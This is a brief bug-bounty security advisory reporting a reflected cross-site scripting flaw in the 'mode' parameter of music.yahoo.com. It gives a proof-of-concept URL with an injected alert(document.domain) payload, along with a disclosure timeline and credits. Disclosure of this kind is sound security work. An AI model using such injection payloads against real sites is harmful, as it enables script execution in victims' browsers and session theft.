Advisory: Yahoo Bug Bounty Program Vulnerability #6 Cross-site Scripting vulnerability Advisory ID: SSCHADV2013-YahooBB-006 Author: Stefan Schurtz Affected Software: Successfully tested on music.yahoo.com Vendor URL: http://yahoo.com/ Vendor Status: Not tested anymore Bounty: nothing ========================== Vulnerability Description ========================== The 'mode'-Paramter on "https://music.yahoo.com/" is prone to a Cross-site Scripting vulnerability ========================== PoC-Exploit ========================== http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id= mode=multipart"-alert(document.domain)-"&__phase=pre&type=index ========================== Disclosure Timeline ========================== 20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program) ========================== Credits ========================== Vulnerability found and advisory written by Stefan Schurtz. ========================== References ========================== http://yahoo.com/ http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-006.txt